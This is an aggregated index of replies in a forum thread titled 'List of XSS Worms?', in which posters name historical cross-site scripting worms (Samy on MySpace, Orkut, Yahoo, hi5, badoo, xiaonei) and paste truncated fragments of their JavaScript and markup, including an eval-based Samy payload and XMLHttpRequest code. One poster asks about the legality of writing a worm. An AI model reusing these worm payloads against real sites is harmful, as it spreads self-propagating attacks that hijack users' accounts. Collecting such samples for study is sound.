Quantcast
Channel: List of XSS Worms?
Browsing all 22 articles
Browse latest View live

List of XSS Worms?

Hi! Do you guys know any other XSS Worms beside this: MySpace.com Sammy's Worm http://shiflett.org/blog/2005/oct/myspace-csrf-and-xss-worm-samy Libero.it, Tiscali.it, Lycos.it, Excite.com Nduja Worm...

View Article



Re: List of XSS Worms?

http://www.xssed.com/ There's a list!

View Article

Re: List of XSS Worms?

@Super-Friez http://en.wikipedia.org/wiki/Computer_worm

View Article

Re: List of XSS Worms?

Oops, sorry. I'm still relatively new here.

View Article

Re: List of XSS Worms?

A web Named xiaonei had one ! var req = null; var step=null; var DiaryMonthUrlList="",DiaryUrlList=""; var timer=null; var bIsBusy=false; var...

View Article


Re: List of XSS Worms?

@sirdarckcat, here are a few more. There are more but some of the code has been nuked for various reasons. These are all still intact. U-dominion.com:...

View Article

Re: List of XSS Worms?

Here is a link to a slightly more advanced version of that first Gaiaonline.com worm. http://www.xssed.com/article/1/Paper_Anatomy_of_a_Pseudo-Reflective_Worm/ The code is still available at the link...

View Article

Re: List of XSS Worms?

Wow, those worms are really amazing. They are killing those sites reputation.

View Article


Re: List of XSS Worms?

Here is one of the Yahoo worms. Not sure if this is Yamanner or another one: <div class="msgarea"><img src="http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif" target>= 0) {...

View Article


Re: List of XSS Worms?

The Orkut XSS worm code: http://antrix.net/journal/techtalk/orkut_xss.html function $(p,a,c,k,e,d) { e=function(c) {...

View Article

Re: List of XSS Worms?

Here is the decoded version of the above Orkut worm: I guess Rodrigo Lacerda used the following packer to pack the javascript: http://dean.edwards.name/packer/ ..... then modified it a little bit...

View Article

Re: List of XSS Worms?

The hi5.com worm: <?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml"> <binding id="xs"> <implementation>...

View Article

Re: List of XSS Worms?

Does anyone know of the legalities behind worm creation? Specifically the creation, and documentation of, but not necessarily the deployment. I'm looking to write a worm for a specific service and let...

View Article


Re: List of XSS Worms?

well, I think the best person to ask is sammy :P

View Article

Re: List of XSS Worms?

Yeah, but the difference is he would be that he was the one who deployed it. I'm looking only to write one, but not put it to personal use. I'm sure it has to be legal in some manner or another. Look...

View Article


Re: List of XSS Worms?

Since it appeared on slashdot today... [www.theregister.co.uk] Regarding your question, the article states: "The guidelines establish that to successfully prosecute the author of a tool it needs to be...

View Article

Re: List of XSS Worms?

Back on topic, we shouldn't forget Samy (for historical reasons if nothing else): <div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="var...

View Article


Re: List of XSS Worms?

QuoteI once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a...

View Article

Re: List of XSS Worms?

Orkut "Crush" Worm // ==UserScript== // @name Master mind // @author "Ishu" // @provided by http:// // @description Ishu // @include *Ishu* // ==/UserScript== function fwScrap() { document.title =...

View Article

Re: List of XSS Worms?

http://badoo.com var x; b=Math.floor(Math.random()*1000000); if(window.XMLHttpRequest) x = new XMLHttpRequest(); else if(window.ActiveXObject) x = new ActiveXObject("Microsoft.XMLHTTP");...

View Article
Browsing all 22 articles
Browse latest View live




Latest Images